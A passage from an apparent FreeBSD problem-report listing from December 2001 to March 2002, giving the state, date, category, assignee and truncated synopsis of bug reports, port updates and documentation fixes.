which depends on apache don't f [2001/12/08] misc/32605 nsouch SMBus driver broken o [2001/12/09] ports/32651 ache a small patch to obtain socks5 support to o [2001/12/09] kern/32652 joe A new ioctl to uscanner s [2001/12/09] ports/32653 joe Added patches to improve USB scanner supp f [2001/12/09] bin/32657 sed file handing is non-standard o [2001/12/09] kern/32659 dillon VM and VNODE leak with vm.swap_idle_enabl o [2001/12/09] gnu/32661 dd send-pr uses $LOGNAME for From and Reply o [2001/12/09] docs/32662 dd arp(8) uses "this host" with two differen o [2001/12/10] i386/32666 imp mbufs leaks in dev/ed o [2001/12/10] bin/32667 systat waste too much time reading input o [2001/12/10] kern/32671 imp Patch to generate usbdevs.h automatically o [2001/12/10] docs/32674 doc no man page for the ntp_adjtime system ca a [2001/12/10] bin/32675 kris openssl dhparam hangs when using /dev/ran o [2001/12/10] kern/32677 pciconf -l opens /dev/pci for read/write o [2001/12/10] misc/32680 [PATCH] Allows users to start jails by ho o [2001/12/10] ports/32690 keichii Uodate port: chinese/rxvt from 2.7.5 to 2 o [2001/12/11] ports/32704 obrien update ical to use tk8.3 o [2001/12/12] ports/32762 ache Update for archivers/xpk o [2001/12/13] kern/32799 ucom and uplcom drivers ported from NetBS o [2001/12/13] bin/32808 dwmalone [PATCH] tcpd.h lacks prototype for hosts_ o [2001/12/13] kern/32812 roger bktr driver missing tuner for eeprom dete o [2001/12/14] bin/32828 phk w incorrectly handles stale utmp slots wi o [2001/12/15] kern/32880 ambrisko Update aironet driver to correct signal s o [2001/12/16] gnu/32902 Incremental tar archiving using GNU style o [2001/12/16] kern/32912 msmith options misssing TCBHASHSIZE o [2001/12/16] ports/32917 portmgr installing ports may fail if $GREP_OPTION o [2001/12/17] ports/32926 lioux [NEW PORT] djvulibre-3.5.2--a Mozilla plu o [2001/12/17] bin/32935 /bin/sh buildin echo command have invalid o [2001/12/17] ports/32936 mharo ports/security/keyprint only supports S/K o [2001/12/18] conf/32976 assar Kerberos5 config files not installed by d o [2001/12/18] docs/32979 assar manpages are not installed for k5admin an o [2001/12/18] ports/32999 ports New ports: devel/ORBacus4 o [2001/12/19] kern/33004 n_hibma Patch for USB (uhci) o [2001/12/19] misc/33007 n_hibma umass device timeout after successive use o [2001/12/19] ports/33008 will New Port: x11-wm/kwinacqua o [2001/12/19] misc/33013 cg mixer does not have treble/bass for Sound o [2001/12/19] kern/33014 installkernel without buildkernel gives c o [2001/12/19] conf/33018 Patch for RC (add multiple SSHD configura o [2001/12/20] ports/33039 keith update port: chinese/moefonts-cid for pkg o [2001/12/20] ports/33049 mharo proftpd file permission error. o [2001/12/21] bin/33066 rwatson sysinstall does not write to new disks as a [2001/12/22] ports/33094 okazaki converters/mule-ucs, add emacs21 support s [2001/12/22] ports/33095 dirk update cdrtools to 1.11a13pre3 (1.10.p11. o [2001/12/22] i386/33097 sound Crystal 4237b mixer problems o [2001/12/23] ports/33108 portmgr Generate an error if WRKDIRPREFIX == /usr o [2001/12/23] ports/33109 ports Xercec-C++ port proposals o [2001/12/23] kern/33117 empty struct md_coredump in pcb.h and use o [2001/12/23] ports/33118 keith update port: chinese/moefonts-cid for Ado o [2001/12/23] kern/33124 jhb kthread_create doesnt mark kthreads as kt o [2001/12/23] bin/33133 keyinit outputs wrong next login password o [2001/12/23] ports/33134 keith update port: chinese/ghostscript6 for Ado o [2001/12/23] ports/33135 ports New port: devel/kprof - A profiling tool a [2001/12/25] ports/33168 ports new port: mail/mavbiff o [2001/12/25] ports/33176 ports fix minor build problem with ac-archive o [2001/12/25] gnu/33182 mp gdb seg faults when given handle SIGALRM s [2001/12/26] ports/33192 znerd java/jdbcpool: update to 0.99 o [2001/12/26] ports/33196 portmgr duplicate lines in /usr/ports/INDEX o [2001/12/26] kern/33202 msmith sys/dev/mly/mly.c minor mly_printf cosmet o [2001/12/26] kern/33203 dillon "got bad cookie" errors on NFS client o [2001/12/26] ports/33207 ports LPRng port update o [2001/12/26] ports/33209 ports LPRngTool port o [2001/12/26] ports/33212 tobez perl5 port fails to register dependency o o [2001/12/26] ports/33224 me Build breaks on CURRENT due to 0 o [2002/02/01] ports/34523 ports man pages of nwclient602 install to wrong o [2002/02/01] docs/34529 doc [patch] Grammar nits in usbd.conf(5) and f [2002/02/01] i386/34537 The second NIC card could not get configu o [2002/02/01] gnu/34538 mp_set_memory_functions not extern "C"'d o [2002/02/01] docs/34547 keramida [patch] edits of FAQ Introduction o [2002/02/02] ports/34550 ports ghostscript-gnu-nox11 portversion 6.51 fa o [2002/02/02] ports/34565 ports graphics/blender port is broke o [2002/02/02] ports/34567 ports New port: IMCom command-line Jabber clien f [2002/02/02] ports/34570 ports Broken "Makefile" in /usr/port/misc/afbac o [2002/02/03] docs/34577 doc Some man pages still advise using "confli o [2002/02/03] docs/34583 murray DECLARE_MODULE(9) man page is broken. o [2002/02/03] kern/34591 ICMP bandwidth limiting does not indicate f [2002/02/03] misc/34596 slow gettimeofday in FreeBSD 4.5 o [2002/02/03] ports/34597 eivind [PATCH] Update ports/mail/isync to 0.8 o [2002/02/03] ports/34600 kevlo Update port: textproc/xerces to 2.0.0 o [2002/02/04] misc/34621 billf i have a patch for (lol) /usr/games/fish o [2002/02/04] docs/34626 doc Copyright on "Index of /mail/current" pag o [2002/02/04] bin/34628 sobomax pkg-routines ignore the recorded md5 chec o [2002/02/04] bin/34629 des fetch(1) cannot download RH 7.2 ISOs from o [2002/02/05] ports/34635 ports games/flightgear o [2002/02/05] kern/34637 LINT is wrong -- NMBCLUSTERS doesn't auto o [2002/02/05] misc/34642 Windows 2000 will not dual boot with Free o [2002/02/05] docs/34654 doc Update UIDs for porters handbook o [2002/02/06] ports/34659 reg Proposed change to Mozilla port's Makefil o [2002/02/06] kern/34665 darrenr ipfilter rcmd proxy "hangs". o [2002/02/06] misc/34673 Second call to select() waits ~100ms befo o [2002/02/06] bin/34676 obrien dhclient always in -q quiet mode (PATCH E o [2002/02/07] gnu/34709 [patch] Inaccurate GDB documentation o [2002/02/07] kern/34712 [patch] SCSI quirk for USB Memorybird o [2002/02/07] ports/34714 ache unzip(1) breaks filenames in non-ASCII ch o [2002/02/07] ports/34717 portmgr bsd.port.mk: extraneous quotes in PTHREAD o [2002/02/07] ports/34718 portmgr make fetch-list includes things make fetc f [2002/02/07] bin/34728 murray DHCP hostname set as Hexadecimal string o [2002/02/08] conf/34729 sheldonh treat smbfs as network file system in /et o [2002/02/08] conf/34733 green useless/invalid lomac option added by sys o [2002/02/08] ports/34737 ports New port: graphics/lodju o [2002/02/08] ports/34742 obrien bash2 missing build dependency on autocon o [2002/02/08] docs/34743 doc nfsd(8) lacking signal explanation o [2002/02/08] kern/34747 joe Please add USB floppy entry o [2002/02/09] misc/34759 Phantasia does not accept [enter] key o [2002/02/09] ports/34760 ports New port: net/dstumbler a curses based ap a [2002/02/09] ports/34770 dougb Update port: graphics/xpdf to 1.00 (fix p o [2002/02/09] conf/34776 rc.diskless1 creates insufficiently sized o [2002/02/09] ports/34779 ports Update port: ja-kdevelop, ja-kdenetwork, o [2002/02/10] misc/34788 dwmalone dmesg issues with console output o [2002/02/10] kern/34789 joe PNY brand USB flash readers need 10 byte o [2002/02/10] ports/34792 ports New port: acfax o [2002/02/10] ports/34796 jmz wrong path in /etc/XF86Config (purely cos a [2002/02/10] ports/34804 ports .asmailrc -- the user config file for por o [2002/02/10] ports/34809 ports german/bbbike update o [2002/02/10] ports/34815 lioux new port: freenet, the anonymous internet o [2002/02/11] kern/34820 FreeBSD should be able to beep after shut o [2002/02/11] ports/34827 billf [patch] net/ethereal has a changed master o [2002/02/11] bin/34832 /usr/share/man/cat3/setkey.3.gz linked to o [2002/02/11] bin/34834 "fix" of du(1) and -h o [2002/02/11] ports/34841 dirk Adding cyrus to mod_php o [2002/02/11] bin/34843 fenner `tcpdump port echo' filters for port 4 in f [2002/02/11] misc/34847 oversight in LINT documentation line o [2002/02/11] misc/34850 scp cannot talk to ssh2 sites that have S o [2002/02/11] kern/34854 /src/sys/dev/sound doesn't work correctly o [2002/02/12] ports/34870 ports new port: lang/pnetlib o [2002/02/12] bin/34874 Netstat output to small o [2002/02/12] ports/34876 ports Update port: net/cricket to 1.0.3 o [2002/02/12] ports/34878 chern sysinstall o [2002/02/12] kern/34880 Impossibility of grouping IP into a pipe f [2002/02/13] ports/34901 gnome sodipodi-0.24.1 core dumps o [2002/02/13] bin/34919 portmap can not exclusively bind to 127.0 o [2002/02/13] misc/34924 kscd crash on startup signal 11 o [2002/02/13] ports/34925 billf [PATCH] Fix build of net-snmp o [2002/02/14] ports/34928 ports New port for cppunit f [2002/02/14] misc/34935 New locale (Cyrillic Windows Codepage 125 o [2002/02/14] kern/34942 Attempt to play -> "pcm0: play interrupt o [2002/02/14] alpha/34948 alpha Promise TX2 ATA133 controller doesnt work o [2002/02/14] kern/34952 Mouse cursor invisible with USB mice and o [2002/02/15] bin/34955 doc [PATCH] ps(1) is out of touch with realit o [2002/02/15] kern/34963 identify procs belonging to the same jail o [2002/02/15] kern/34965 4.4, 4.5 freeze at boot time on ASUS P2B o [2002/02/15] ports/34970 kris patch for ports/security/pks o [2002/02/15] ports/34974 kde Incorrect mouse config in kde 2.2.2 o [2002/02/15] ports/34975 ports mplayer don't compile with divx codec o [2002/02/15] ports/34981 ports new port: misc/bibletime: biblestudy appl o [2002/02/15] ports/34985 ports New port: net/ldapdiff A utility to patch o [2002/02/15] ports/34987 portmgr bsd.port.mk: silence awk's warning o [2002/02/15] ports/34988 portmgr bsd.port.mk: use ECHO_CMD instead of ECHO o [2002/02/15] ports/34991 ports New port: durep (displays disk usage in a o [2002/02/16] ports/34997 ports xf86cfg core dumps o [2002/02/16] ports/34999 ports New Port: QScheme scheme interpretor o [2002/02/16] ports/35006 ports New port archivers/arj: ARJ32 v 3.10 file o [2002/02/16] ports/35007 ports New port archivers/arj: ARJ32 v 3.10 russ o [2002/02/16] kern/35010 pcm0 fails to attach with Intel 82801BA ( a [2002/02/16] docs/35011 doc There are no commands called "diskless" o o [2002/02/16] ports/35014 ports lame port does not depend on Gtk so far. o [2002/02/16] bin/35018 brian enhancing daily/460.status-mail-rejects o [2002/02/16] ports/35023 ports openmotif,openmotif-devel -> openmotif2.2 o [2002/02/17] ports/35037 ports New port: sysutils/cfengine-devel o [2002/02/17] ports/35038 ports cleanup pkg-plist for x11-toolkits/Xaw3d o [2002/02/17] ports/35051 portmgr Repocopy request: www/horde-devel -> www/ o [2002/02/17] ports/35060 ports New port: deskmenu (GTK root menu applica o [2002/02/17] ports/35062 ports New Port: audio/xmms-mailnotify 0.2.0 o [2002/02/17] kern/35064 ACPI not work with Epox 8KHA+ motherboard o [2002/02/17] bin/35070 math(3) references section "3m", etc. o [2002/02/18] i386/35078 Uninitialized pointer dereference in func f [2002/02/18] ports/35079 znerd Allow JDK version to be overridden in jav o [2002/02/18] ports/35080 znerd Allow JDK version to be overridden in jav o [2002/02/18] ports/35084 kde kdegraphics package on ftp.freebsd.org is o [2002/02/18] ports/35090 ports stuffit-5.2.0.611 fails to register man p o [2002/02/18] ports/35092 ports Xterm termcap should have color capabilit o [2002/02/18] bin/35099 sobomax ldd in -STABLE fails on libc. o [2002/02/18] i386/35101 chern cvusupit and other packages won't extract o [2002/02/18] ports/35102 ports New port: Ultima IV engine o [2002/02/18] ports/35106 ports Update port: mail/p5-MIME-Lite to 2.117 o [2002/02/19] bin/35109 [PATCH] games/morse: add ability to decod o [2002/02/19] bin/35113 grdc enhancement: countdown timer mode o [2002/02/19] ports/35117 ports Undefined symbol "ldap_get_dn" when tryin o [2002/02/19] i386/35124 No mouse with FreeBSD 4.5 with ECS K7S5a o [2002/02/19] ports/35128 ports Canon Powershot A20 support for s20sh f [2002/02/19] misc/35130 bmah Example dd command for making 4.x install o [2002/02/19] ports/35131 ports New port: unittest framework for c o [2002/02/20] ports/35144 roger openh323 won't compile on -stable (fix in o [2002/02/20] ports/35146 ports New port: A Unit testing framework for Ad o [2002/02/20] bin/35148 ppp/nat-problems after cvs update 4.3 -> o [2002/02/20] gnu/35156 obrien suggestion: hard link /usr/bin/awk to /us o [2002/02/20] ports/35157 ports ports/sysutils/httplog has a checksum err o [2002/02/20] ports/35165 ports New port: textproc/smart an information r o [2002/02/20] ports/35166 ports [NEW PORT} xine-mms o [2002/02/20] ports/35170 ports New port: p5-PDA-Pilot: experimental Perl o [2002/02/20] kern/35171 Moused needs to be enabled to run a USB m o [2002/02/21] misc/35172 Please update am-utils(amd) into newer ve o [2002/02/21] kern/35175 ptrace(PT_DETACH, ....) doesn't do signal o [2002/02/21] ports/35177 chuckr math/gnuplot missing WITHOUT_X11 option o [2002/02/21] conf/35178 ipfilter for IPV6 not availlable in rc.* o [2002/02/21] i386/35182 APMD does not set close on exec for /dev/ o [2002/02/21] ports/35187 ports New port: xmlada - an xml processing libr o [2002/02/21] ports/35190 ports New Port: autoproject o [2002/02/21] ports/35192 billf ports/net/net-snmp garbles /usr/local/sha o [2002/02/21] ports/35193 ports New port: astro/nightfall o [2002/02/21] kern/35195 msync performance on large files o [2002/02/21] ports/35197 dirk [PATCH] fix "auto-crash" build failure on o [2002/02/21] ports/35199 ports New ports: japanese/phpgroupware o [2002/02/21] bin/35201 link and unlink are not SUSv2-compliant a o [2002/02/22] ports/35204 dirk www/mod_php4 with xslt is not LOCALBASE c o [2002/02/22] ports/35205 ports New port: russian/mtc - Multifile text En o [2002/02/22] ports/35221 kde kdenetwork2 won't compile o [2002/02/22] docs/35222 doc mailing list archive URL regexp suboptima o [2002/02/22] bin/35226 mtree - strange behaviour on some filenam o [2002/02/23] kern/35234 World access to /dev/pass? (for scanner) o [2002/02/23] conf/35240 Update to etc/services o [2002/02/23] conf/35242 Change to etc/periodic/weekly/330.catman o [2002/02/23] ports/35244 ports proper fix for x11-fm/endeavour's strcase f [2002/02/23] misc/35245 brian unwanted stealth behaviour (inbound icmp o [2002/02/23] ports/35249 ports no man page for latex2html o [2002/02/23] conf/35262 Generation of boot block for headless ope o [2002/02/23] ports/35265 nobutaka Port /usr/ports/graphics/xine is broken o [2002/02/23] ports/35266 lioux New port: LimeWire o [2002/02/23] kern/35269 possible panics with 4:1 filesystem ratio o [2002/02/23] ports/35270 ports converters/p5-Convert-TNEF has wrong pkg- o [2002/02/24] docs/35280 doc [PATCH] null-modem cable pinout in 'Seria o [2002/02/24] ports/35285 ports New port textproc/prosper: a LaTeX class o [2002/02/24] ports/35286 ports new port: misc/ncdialog (new cdialog by T o [2002/02/24] kern/35289 Brooktree device doesnt properly signal a o [2002/02/24] ports/35298 ports New port: biology/primer3 o [2002/02/24] ports/35303 ports New port: gimp-print, print drivers for C o [2002/02/25] kern/35324 Plug and Play probe fails to configure Di o [2002/02/25] ports/35328 ports emulators/bochs doesn't compile on -curre o [2002/02/25] ports/35330 ports New port: biology/wise o [2002/02/25] ports/35331 ports New port: JESS is a nice visualization pl o [2002/02/25] ports/35332 ports New port: biology/flip s [2002/02/25] bin/35333 send-pr(1) vim syntax highlighting suppor o [2002/02/25] ports/35334 ports Please add md2k driver to print/ghostscri o [2002/02/26] docs/35343 doc Old broken Unix docco Makefiles o [2002/02/26] docs/35345 doc Restore old yacc documentation o [2002/02/26] ports/35346 dburr upgrade to opennap-0.44 o [2002/02/26] ports/35355 ports New port: databases/gbib o [2002/02/26] ports/35362 ports x11-fonts/tkfont: use tk83 o [2002/02/26] ports/35368 ports New port: devel/p5-VCS f [2002/02/27] ports/35372 ports pgp6 ports fails to compile on alpha plat o [2002/02/27] ports/35375 kde x11/kdebase2 creates files not listed in o [2002/02/27] kern/35377 process gets unkillable (-9) in "ttywai" o [2002/02/27] docs/35378 doc Handbook has inaccurate description of f o [2002/02/27] misc/35381 incorrect floating-point display of large o [2002/02/27] ports/35383 ports new port DarwinStreamingServer o [2002/02/27] ports/35385 ports port update: security/ssh2 o [2002/02/27] kern/35392 atapi tape driver does not maintain devic o [2002/02/27] bin/35393 Patch to add STANDARDS section to strerro o [2002/02/28] misc/35400 sysinstall could improve manipulation of a [2002/02/28] ports/35406 ports New port submission o [2002/02/28] ports/35418 trevor Update port: x11-wm/evilwm to 0.9.44.1 o [2002/02/28] docs/35436 doc PAO isn't very latest-and-greatest these o [2002/02/28] ports/35438 ports new port: net/driftnet o [2002/03/01] ports/35447 ports Update port: databases/p5-SQL-Statement t o [2002/03/01] ports/35448 ports Update port: databases/p5-DBD-CSV to 0.20 o [2002/03/01] i386/35449 [PATCH] another small fix for doscmd o [2002/03/01] bin/35451 PATCH: pkg_add -r able to save local copy o [2002/03/01] bin/35454 mtree can't handle symlinks referencing f o [2002/03/01] ports/35456 portmgr [PATCH] Add a distfiles-list target o [2002/03/01] conf/35457 dual boot problem from 2 different SCSI d s [2002/03/01] ports/35459 ports portupgrade doesn't clean up dependencies o [2002/03/01] kern/35463 [patch] wi(4) doesn't comprehend standard o [2002/03/02] ports/35476 ports port version upgrade and ogg library fix o [2002/03/02] ports/35479 ports New Port: A small stand-alone program for o [2002/03/02] ports/35481 ports New port: console text editor looks like o [2002/03/02] ports/35487 ports New port: gtkgrepmail (A gtk front-end to o [2002/03/02] ports/35488 portmgr Mk/bsd.port.mk: dump only last 100 lines o [2002/03/02] docs/35491 green sshd(8) has an incorrect path o [2002/03/02] bin/35505 [PATCH] Feature enhancement for sed(1) o [2002/03/03] kern/35512 ATA/ATAPI CD driver: impossible to set cd o [2002/03/03] ports/35514 portmgr Use the value of hw.machine_arch instead o [2002/03/03] ports/35516 ports ports/irc/ninja tar-file on master site n o [2002/03/03] ports/35520 ports New port devel/whups: a web-based bug tra a [2002/03/03] bin/35521 nsupdate fails if destination dns is not o [2002/03/03] ports/35522 ports xhtml port uses SGMLDECL in catalog chain o [2002/03/03] docs/35523 doc manpage fixes for df(1) and ls(1) o [2002/03/03] ports/35525 ports update-port: graphics/jpeg2ps-letter o [2002/03/03] i386/35526 No mouse recognized in Compaq Presario la o [2002/03/04] misc/35542 bde BDECFLAGS needs -U__STRICT_ANSI__ o [2002/03/04] conf/35545 Enhanced periodic scripts o [2002/03/04] ports/35546 olgeni security/nessus compilation error due to o [2002/03/04] ports/35547 ports [patch] www/links: add -width option o [2002/03/04] ports/35549 ports new port editors/texmacs doesn't build on o [2002/03/05] ports/35565 des audio/mpg123 fails to write to WAV files o [2002/03/05] ports/35566 ports new ports: Lire a multiple log files anal o [2002/03/05] ports/35567 ports update port: databases/dbconnect o [2002/03/05] bin/35568 make declares target out of date, but $? o [2002/03/05] docs/35575 doc Pw(8) man page makes no mention of /var/l o [2002/03/05] ports/35578 ports mail/faces: make NAS default since xfaces o [2002/03/05] ports/35580 ports Starup script in /usr/local/etc/rc.d is i o [2002/03/06] ports/35588 ports audio/ripit patch to make use of new acdX o [2002/03/06] ports/35589 ports New port: security/p5-Digest o [2002/03/06] ports/35594 ports Bug: misc/kwatch fails to build if autoco o [2002/03/06] ports/35596 ports Maintainer update: make py-omniorb builda f [2002/03/06] i386/35599 murray install o [2002/03/06] docs/35602 doc dump(8)/restore(8) pages don't explain "a o [2002/03/06] docs/35603 doc grep(1) page is missing info on zfgrep, z o [2002/03/06] docs/35605 doc chmod(1) page misleads by use of "regardl o [2002/03/06] docs/35606 trhodes date(1) page doesn't say which clock(s) i o [2002/03/06] docs/35607 doc dump(1) page needs discussion of scary er o [2002/03/06] docs/35608 doc mt(1) page uses "setmark" without explana o [2002/03/06] docs/35609 doc mt(1) page needs explanation of "long era o [2002/03/06] docs/35612 doc ps(1) page "state" description doesn't me o [2002/03/06] bin/35616 jmallett Patch to bring printf(1) up to POSIX.2 (1 o [2002/03/06] ports/35617 ports mail/faces: add USE_SOX, WITHOUT_AUDIO kn o [2002/03/06] bin/35621 jmallett Patch to add P1003.1-2001 -t option to un o [2002/03/07] ports/35624 ports New port: japanese/p5-Date-Japanese-Era o [2002/03/07] bin/35628 luigi ifpw(8) doesn't set RED parameters for du o [2002/03/07] ports/35634 ports audio/rplay: install daemon startup as rc o [2002/03/07] kern/35635 [patch] missing dep in libiconv prevents o [2002/03/07] kern/35636 dd [PATCH] can't input russian chars using w o [2002/03/07] ports/35638 markm tn3270 dumps core unconditionally o [2002/03/07] ports/35639 ports executable name conflicts: ploticus and s o [2002/03/07] docs/35642 doc lo(4) page maybe should document optional o [2002/03/07] ports/35643 ports Update port: print/lout to 3.25, want to o [2002/03/07] docs/35644 doc lo(4) page presumes familiarity with prin o [2002/03/07] docs/35646 doc cp(1) page needs a "Bugs" section. o [2002/03/07] docs/35647 doc www; combine query-by-number and multi-fi o [2002/03/07] docs/35648 doc rc.conf; add note about "flags" to both f o [2002/03/07] docs/35649 doc mount_smbfs(8) page: "See ./examples/dot. o [2002/03/07] docs/35651 trhodes mount(8) man page contains references to o [2002/03/07] docs/35652 doc bsd.README seriously obsolete o [2002/03/07] ports/35657 jmz The language in Brazil is portuguese, not o [2002/03/07] ports/35659 ports x11-fonts/webfonts extract fails o [2002/03/07] ports/35661 ports new port: mycb o [2002/03/07] ports/35666 portmgr new bsd.port.mk support for GCC 2.95 and o [2002/03/08] ports/35667 ports net/pppload patch so it doesn't show wron o [2002/03/08] ports/35668 ports Link sqsh with readline o [2002/03/08] ports/35670 ports /usr/ports/databases/sqsh - bogus depende o [2002/03/08] bin/35671 wrong comments in rc.diskless1 o [2002/03/08] ports/35682 ports apache13-ssl needs update o [2002/03/08] docs/35686 doc blackhole(4) page seems to contradict its o [2002/03/08] docs/35687 doc /etc/nsmb.conf missing mention of readers o [2002/03/08] docs/35688 trhodes fdisk(8) page extraneous "being", etc. o [2002/03/08] ports/35694 ports Port of scons is way out of date o [2002/03/08] docs/35696 doc mount_smbfs(8) references a nonexistent n o [2002/03/08] kern/35699 [PATCH] msdosfs: differrent masks for dir o [2002/03/08] kern/35700 a small code update o [2002/03/09] ports/35708 ports New port: audio/abcmidi utilities for abc o [2002/03/09] ports/35710 portmgr Request repocopy: devel/automake -> devel o [2002/03/09] docs/35711 doc the "gnats page" should move to its own s o [2002/03/09] bin/35717 which(1) returns wrong exit status for m o [2002/03/09] bin/35718 which(1) command does not handle file nam o [2002/03/09] bin/35719 which(1) ignore empty components of $PATH o [2002/03/09] misc/35727 man(1) program should not display (old) d o [2002/03/10] docs/35732 doc adduser(8) page has obsolete reference an o [2002/03/10] ports/35737 ports New port: audio/abcselect - extract part o [2002/03/10] ports/35739 ports Maintainer update of mail/imp3: chasing n o [2002/03/10] ports/35740 ports Maintainer update of mail/imp: chasing ne o [2002/03/10] ports/35748 ports new port: www/smarty o [2002/03/10] ports/35753 ports New Port: biology/act f [2002/03/10] ports/35755 ports Update to sysutils/LPRng port o [2002/03/10] ports/35762 ports Speak Freely hangs while reading from aud o [2002/03/11] misc/35764 Icewm does not display APM status properl o [2002/03/11] ports/35766 ports New Port: emulators/hercules o [2002/03/11] ports/35767 portmgr make_index script does not deal with syml o [2002/03/11] bin/35769 w does not correctly interpret X sessions o [2002/03/11] misc/35770 Why there is no /usr/local/bin in PATH va o [2002/03/11] ports/35776 gnome New option for mozilla port o [2002/03/11] ports/35779 kde bug: x11-toolkits/qt23 does not know zh_C o [2002/03/11] ports/35784 ports reposting pic2fig port as a diff against o [2002/03/11] docs/35800 obrien [PATCH] removal of -kthread in gcc man pa o [2002/03/11] ports/35809 ports graphics/tcm build fails after bison buil o [2002/03/11] bin/35812 strings(1) does'n print russian character o [2002/03/11] kern/35813 Add another Askey ISA modem o [2002/03/12] ports/35819 demon Update russian/apache13-modssl to apache- o [2002/03/12] docs/35823 doc [PATCH] Little Restructuring of the Devel o [2002/03/12] ports/35827 ports Updated new port: news/newscache 0.99.22 o [2002/03/12] ports/35833 ports ports/chinese/arphicttf and CJK depend on o [2002/03/12] bin/35838 Change to size of WID_IF in usr.bin/netst o [2002/03/12] ports/35841 ports pkgdep missing from pptpclient o [2002/03/13] kern/35846 timeout in wi_cmd 11, machine hangs for a o [2002/03/13] ports/35853 znerd New port: java/jboss o [2002/03/13] ports/35856 ports Repo copy print/gnomeprint to print/libgn s [2002/03/13] misc/35858 des Test PR o [2002/03/13] ports/35859 ports New port: Network traffic accounting daem o [2002/03/13] kern/35861 brooks if_vlan module is compiled with ZERO vlan o [2002/03/13] ports/35864 ports ports with invalid dependencies to glib13 o [2002/03/13] misc/35865 pam_krb5 crashes in pam_sm_setcred() o [2002/03/13] kern/35876 bus_dmamem_free does not call contigfree o [2002/03/13] ports/35879 portmgr autoconf-2.52_2 creates empty case/esac s o [2002/03/13] ports/35882 ports Perl Expect module send_slow hangs on EOF o [2002/03/13] kern/35883 probe for ATI Rage128 Pro o [2002/03/14] bin/35886 [patch] Enhancement: custom time format f o [2002/03/14] bin/35894 bbraun popen.c in cron won't build without LOGIN o [2002/03/14] ports/35897 ports upgrading the linux_base port runs into t o [2002/03/14] kern/35900 Changing RealTek 8139 MAC address fails f [2002/03/14] ports/35901 ports [SHAR] New port: editors/scribus. This PR o [2002/03/14] ports/35913 ports New port: The high perfomance Python adap f [2002/03/14] misc/35918 Xset , XTGA and Xhtml Damaged o [2002/03/14] ports/35919 ports CompuPic 5.1.1016 o [2002/03/15] ports/35927 portmgr Permission sought to commit this automake p [2002/03/15] bin/35929 maxim A small bug in renice o [2002/03/15] docs/35932 doc Insufficient description of ``log_in_vain o [2002/03/15] ports/35937 ports New port: taipan-0.9 o [2002/03/15] docs/35939 doc ipfw(8) needs explicit statement about no o [2002/03/15] docs/35941 doc cd(4) manual doesn't mention "target" use o [2002/03/15] docs/35942 doc at(1) manual doesn't describe at.allow an o [2002/03/15] docs/35943 doc at(1) config files are misplaced in /var/ o [2002/03/15] ports/35946 ports The /usr/local/lib/RealPlayer8/postinstal a [2002/03/15] docs/35947 trhodes disklabel(8) manual missing "2" in exampl o [2002/03/15] docs/35948 trhodes disklabel(8) manual uses archaic "pack" a o [2002/03/15] docs/35949 doc [PATCH] rtprio(1) man page uses incorrect a [2002/03/15] docs/35951 trhodes disklabel(8) manual confuses partitions a o [2002/03/15] docs/35953 doc hosts.equiv(5) manual is confusing or wro o [2002/03/15] ports/35966 nakai Update port: x11-wm/qvwm to 1.1.12 o [2002/03/15] docs/35967 doc rc.conf(5) manual missing "dumpdir" and " o [2002/03/16] kern/35978 improve kobj method dispatch o [2002/03/16] ports/35982 ports [MAINTAINER UPDATE] databases/firebird - o [2002/03/16] kern/35988 Seimens SpeedStream PCI/PCMCI Adaptor for o [2002/03/16] kern/35993 murray sys/dev/amr/amr.c - Compiler warnings und o [2002/03/16] ports/35995 ports New port: ophoto o [2002/03/16] kern/35999 add support for general flash disks to sc o [2002/03/17] bin/36000 contrib/amd uses mktemp o [2002/03/17] kern/36007 [PATCH] USB memory card reader/writer RD5 o [2002/03/17] ports/36009 dirk cdrtools-1.10_1 missing mkisofs o [2002/03/17] ports/36020 jmz Update port: print/musixtex T.98 -> T.104 o [2002/03/17] ports/36024 sobomax port update: OpenJIT 1.1.16 for JDK 1.3.1 o [2002/03/17] ports/36026 steve Update port: x11-toolkits/open-motif to 2 o [2002/03/17] ports/36027 ports patch fails for java/netrexx o [2002/03/17] ports/36030 portmgr PREFIX=/usr causes some problems o [2002/03/17] ports/36034 ports new port databases/pg-crypto o [2002/03/18] ports/36047 ports New port java/jbuilder-personal o [2002/03/18] docs/36055 doc [PATCH] adding some help-yourself-info to o [2002/03/18] ports/36061 ports New port: net/jmsn o [2002/03/18] ports/36065 ports [PATCH] Update AbiWord to 0.99.3 o [2002/03/18] ports/36066 ports New Port: slash, metalist and dependencie o [2002/03/18] standards/36075jmallett P1003.1-2001 m4(1) -s option o [2002/03/18] standards/36076tjr Implementation of POSIX fuser command o [2002/03/18] ports/36078 portmgr Fix MASTER_SITES_NN recursive bug o [2002/03/18] ports/36079 portmgr Support USE_LESSTIF=yes o [2002/03/18] ports/36080 portmgr Support USE_OPENSSL=yes on 4.2 o [2002/03/18] ports/36083 portmgr Installs existing packages for dependecie o [2002/03/19] standards/36087tjr P1003.1-2001 c99 utility o [2002/03/19] ports/36089 ports new port: net/isba - a Perl/Tk GUI for ip o [2002/03/19] ports/36096 ports New port mail/mimedefang o [2002/03/19] misc/36110 dmesg output corrupt if /dev/console is b o [2002/03/19] ports/36112 portmgr [PATCH] New feature for whole ports tree: o [2002/03/19] ports/36113 dirk Add gdbm, BerkeleyDB2, BerkeleyDB3, libio o [2002/03/19] ports/36117 max Update Port:net/delegate(to 7.9.2) o [2002/03/19] conf/36118 re 4.5 Upgrade says it won't touch /usr/src, s [2002/03/19] ports/36119 dinoex openssh 3.1_4 undefined references with S o [2002/03/19] ports/36121 ports Removes installed sys requirement (and dr o [2002/03/19] standards/36126tjr P1003.1-2001 tabs utility o [2002/03/19] docs/36127 darrenr ipnat(5) man page glitches o [2002/03/19] standards/36128tjr Reimplementation of who utility o [2002/03/20] ports/36129 ports Update Port:databases/libiodbc(support pt o [2002/03/20] standards/36130standardsP1003.2 asa utility is missing o [2002/03/20] bin/36136 savecore -z option does not work o [2002/03/20] ports/36139 ports [Maintainer Update] Update lang/nhc98 to o [2002/03/20] ports/36142 ports New port: magyarispell 0.65 o [2002/03/20] misc/36143 Dynamic (non linear) mouse acceleration a o [2002/03/20] ports/36151 max ports/japanese/Canna cannot be compiled w o [2002/03/20] misc/36153 /usr/src/games/fortune/README instruction o [2002/03/20] misc/36154 Getting USB mouse to work: usbd and mouse o [2002/03/21] ports/36162 ports New Port: p5-IO-Socket-Multicast o [2002/03/21] misc/36165 boehm-gc BUS error with gdb o [2002/03/21] kern/36170 an(4) does an_init() even if interface is o [2002/03/21] ports/36178 ports New Port: bozohttpd-0.59 o [2002/03/21] ports/36179 ports Update glide3 port fixing compiling and s o [2002/03/21] ports/36185 will port update: astro/xplanet -> 0.93 o [2002/03/21] ports/36186 will New Port: 